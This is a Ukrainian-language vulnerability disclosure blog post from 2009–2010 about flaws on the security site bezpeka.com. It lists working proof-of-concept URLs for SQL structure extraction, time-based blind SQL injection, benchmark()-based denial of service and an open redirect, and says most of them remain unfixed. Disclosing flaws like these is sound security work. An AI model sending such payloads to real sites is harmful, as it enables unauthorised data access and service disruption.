Уразливості на bezpeka.com
19:14 01.04.201030.09.2009
У лютому, 06.02.2009, я знайшов SQL DB Structure Extraction, SQL Injection, Denial of Service та Redirector уразливості на секюріті сайті http://bezpeka.com. Про що найближчим часом сповіщу адміністрацію сайта.
Раніше я вже писав про уразливості на bezpeka.com.
Детальна інформація про уразливості з’явиться пізніше.
01.04.2010
Раніше сайт працював на домені bezpeka.com, а зараз лише на www.bezpeka.com.
SQL DB Structure Extraction:
http://www.bezpeka.com/ru/redirect/
http://www.bezpeka.com/ru/redirect/?bid=’
http://www.bezpeka.com/ru/redirect/?bcat=’
SQL Injection (сліпа):
http://www.bezpeka.com/ru/redirect/?bid=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)
DoS (через SQL Injection):
http://www.bezpeka.com/ru/redirect/?bid=1%20and%20benchmark(1000000,md5(now()))%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=1%20and%20benchmark(1000000,md5(now()))%23
Redirector:
http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua
З даних уразливостей виправлені лише перша та третя SQL DB Structure Extraction та Redirector (і то неякісно). А всі інші уразливості досі не виправлені.
Остання уразливість знову працює при невеликій зміні URL запиту:
Redirector:
http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua&bid=1&bcat=1